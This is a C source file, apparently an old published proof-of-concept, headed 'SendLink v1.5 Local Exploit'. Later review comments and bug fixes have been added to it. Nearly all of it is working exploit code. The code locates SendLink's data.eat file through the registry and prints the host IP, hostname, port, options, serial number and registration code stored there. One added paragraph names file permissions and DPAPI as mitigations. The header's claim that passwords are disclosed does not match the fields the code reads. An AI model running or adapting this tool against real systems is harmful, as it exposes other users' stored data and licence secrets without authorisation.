
  1. /*****************************************************************
  2.  
  3. SendLink v1.5 Local Exploit by Kozan
  4.  
  5. Application: SendLink v1.5
  6. Vendor:Computer Knacks
  7. http://www.computerknacks.com/
  8.  
  9. Vulnerability Description: SendLink v1.5 discloses passwords to local users.
  10.  
  11. Discovered & Coded by: Kozan
  12. Credits to ATmaCA
  13. Web : www.netmagister.com
  14. Web2: www.spyinstructors.com
  15. Mail: kozan[at]netmagister[dot]com
  16.  
  17. *****************************************************************/
  18.  
  19. #include <windows.h>
  20. #include <stdio.h>
  21. #include <string.h>
  22.  
  /* Capacity, in bytes, of prgfiles and of each temporary key buffer in main(). */
  #define BUFSIZE 100

  /* Registry state shared with main(). */
  HKEY hKey;                    /* handle filled in by RegOpenKeyEx() */
  LONG lRet;                    /* status returned by RegQueryValueEx() */

  /*
   * Receives the ProgramFilesDir registry value; main() then appends the
   * SendLink data-file path to it.
   * NOTE(review): BUFSIZE bytes must hold both the directory and the appended
   * suffix, so a long Program Files path does not fit -- confirm the append
   * in main() is bounded.
   */
  char prgfiles[BUFSIZE];
  DWORD dwBufLen = BUFSIZE;     /* in/out byte count passed to RegQueryValueEx() */

  /* Pointers to the field values returned by oku(), assigned in main(). */
  char *hostip;
  char *hostname;
  char *serial;
  char *options;
  char *regcode;
  char *hostport;
  30.  
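  /**
   * Locate the first occurrence of the byte string Str inside a file.
   *
   * The file is opened in binary mode and scanned from the beginning.
   *
   * Fixes relative to the original listing:
   *  - fclose() is no longer called on a NULL stream when fopen() fails;
   *  - getc() is kept in an int so end-of-file cannot be mistaken for a
   *    0xFF data byte;
   *  - after a partial match the scan resumes at the byte directly after the
   *    candidate start (the original skipped one byte the first time this
   *    happened, so a pattern such as "ab" in "aab" was missed);
   *  - an empty pattern returns -1 instead of looping forever, and a
   *    one-byte pattern can now match.
   *
   * @param FilePath  path of the file to scan
   * @param Str       NUL-terminated pattern; compared byte for byte
   * @return zero-based offset of the first match, or -1 when the file cannot
   *         be opened, an argument is NULL or empty, or there is no match.
   *         The offset is narrowed to int, as in the original interface.
   */
  int adresal(char *FilePath,char *Str)
  {
      size_t pat_len;
      FILE *di;
      long start = 0;
      int Offset = -1;

      if (FilePath == NULL || Str == NULL) {
          return -1;
      }

      pat_len = strlen(Str);
      if (pat_len == 0) {
          return -1;
      }

      di = fopen(FilePath, "rb");
      if (di == NULL) {
          return -1;
      }

      for (;;) {
          size_t matched = 0;
          int ch = EOF;

          /* Compare the pattern against the bytes beginning at `start`. */
          while (matched < pat_len) {
              ch = getc(di);
              if (ch == EOF ||
                  (unsigned char)ch != (unsigned char)Str[matched]) {
                  break;
              }
              matched++;
          }

          if (matched == pat_len) {
              Offset = (int)start;
              break;
          }

          /* Fewer than pat_len bytes remain, so no later start can match. */
          if (ch == EOF) {
              break;
          }

          /*
           * A mismatch on the very first byte leaves the stream at start + 1
           * already; only a partial match needs an explicit rewind.
           */
          if (matched > 0 && fseek(di, start + 1, SEEK_SET) != 0) {
              break;
          }
          start++;
      }

      fclose(di);
      return Offset;
  }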
  70.  
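  /**
   * Read the value stored after the key Str in the file FilePath.
   *
   * The key is located with adresal(); the value is every byte that follows
   * the key up to (not including) the next 0xBB byte or the end of the file.
   *
   * Fixes relative to the original listing:
   *  - the result lives in a static buffer; the original returned the
   *    address of a local array, which is dangling once the function
   *    returns;
   *  - the copy is bounded to the buffer size (the original wrote past the
   *    500-byte array when no 0xBB delimiter followed);
   *  - getc() is kept in an int so end-of-file is not stored as a data byte.
   *
   * @param FilePath  path of the file to read
   * @param Str       NUL-terminated key to search for
   * @return pointer to a NUL-terminated static buffer holding the value, or
   *         an empty string when the key is missing or the file cannot be
   *         read. The buffer is overwritten by the next call, so the
   *         function is not reentrant and earlier results must be consumed
   *         or copied first. Values longer than 499 bytes are truncated.
   */
  char *oku(char *FilePath,char *Str)
  {
      static char Feature[500];
      const int delimiter = 0xBB;   /* byte that ends a stored value */
      FILE *di;
      int Offset;

      Feature[0] = '\0';

      if (FilePath == NULL || Str == NULL) {
          return Feature;
      }

      Offset = adresal(FilePath, Str);
      if (Offset == -1) {
          return Feature;
      }

      di = fopen(FilePath, "rb");
      if (di == NULL) {
          return Feature;
      }

      /* Position the stream on the first byte after the key. */
      if (fseek(di, (long)Offset + (long)strlen(Str), SEEK_SET) == 0) {
          size_t len = 0;
          int ch;

          while (len < sizeof Feature - 1) {
              ch = getc(di);
              if (ch == EOF || ch == delimiter) {
                  break;
              }
              Feature[len++] = (char)ch;
          }
          Feature[len] = '\0';
      }

      fclose(di);
      return Feature;
  }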
  104.  
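  /**
   * Proof of concept for the disclosure described in the file header.
   *
   * Reads ProgramFilesDir from
   * HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion, appends
   * \SendLink\User\data.eat, and prints six settings found in that file
   * (hostip, hostname, hostport, options, serial, regcode). Each value is
   * recovered by a plain byte search through oku(); nothing in this listing
   * decrypts or decodes anything, so the file evidently holds these values
   * in readable form.
   *
   * Defensive reading: the exposure is a settings file that local accounts
   * can read. Restricting that file's ACL to the owning account and storing
   * secrets through a per-user protection mechanism (for example Windows
   * DPAPI) are the usual mitigations; auditing reads of the data file gives
   * a detection point.
   *
   * Fixes relative to the original listing:
   *  - RegCloseKey() is no longer called when RegOpenKeyEx() failed;
   *  - the registry value is explicitly NUL-terminated, because registry
   *    strings are not guaranteed to be stored with a terminator;
   *  - the path suffix is appended only after checking that it fits in
   *    prgfiles (the original strcat() could overflow the buffer);
   *  - the "Serial" line prints serial; the original printed hostip there.
   *
   * @return always 0, including on the error paths (unchanged).
   */
  int main(void)
  {
      static const char data_suffix[] = "\\SendLink\\User\\data.eat";

      if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                       "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                       0,
                       KEY_QUERY_VALUE,
                       &hKey) != ERROR_SUCCESS)
      {
          /* No handle was opened, so there is nothing to close. */
          printf("An error occured!\n");
          return 0;
      }

      /* Leave one byte free for the terminator written below. */
      dwBufLen = BUFSIZE - 1;
      lRet = RegQueryValueEx(hKey, "ProgramFilesDir", NULL, NULL,
                             (LPBYTE)prgfiles, &dwBufLen);
      RegCloseKey(hKey);

      if ((lRet != ERROR_SUCCESS) || (dwBufLen >= BUFSIZE))
      {
          printf("An error occured!\n");
          return 0;
      }
      prgfiles[dwBufLen] = '\0';

      /* sizeof data_suffix already counts the terminating NUL. */
      if (strlen(prgfiles) + sizeof data_suffix > sizeof prgfiles)
      {
          printf("An error occured!\n");
          return 0;
      }
      strcat(prgfiles, data_suffix);

      printf("SendLink v1.5 Local Exploit by Kozan\n");
      printf("Credits to ATmaCA\n");
      printf("www.netmagister.com  -  www.spyinstructors.com \n\n");

      try
      {
          /* Keys have the form  name 0xBB '=' 0xAB ; one buffer is reused. */
          char key[BUFSIZE];

          wsprintf(key,"hostip%c=%c",0xBB,0xAB);
          hostip=oku(prgfiles,key);
          printf("Host IP: %s\n",hostip);

          wsprintf(key,"hostname%c=%c",0xBB,0xAB);
          hostname=oku(prgfiles,key);
          printf("Hostname                        : %s\n",hostname);

          wsprintf(key,"hostport%c=%c",0xBB,0xAB);
          hostport=oku(prgfiles,key);
          printf("Host Port                        : %s\n",hostport);

          wsprintf(key,"options%c=%c",0xBB,0xAB);
          options=oku(prgfiles,key);
          printf("Options                                : %s\n",options);

          wsprintf(key,"serial%c=%c",0xBB,0xAB);
          serial=oku(prgfiles,key);
          printf("Serial                                : %s\n",serial);

          wsprintf(key,"regcode%c=%c",0xBB,0xAB);
          regcode=oku(prgfiles,key);
          printf("Registration Code        : %s\n",regcode);
      }
      catch(...)
      {
          printf("An error occured!\n");
          return 0;
      }

      return 0;
  }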
  178.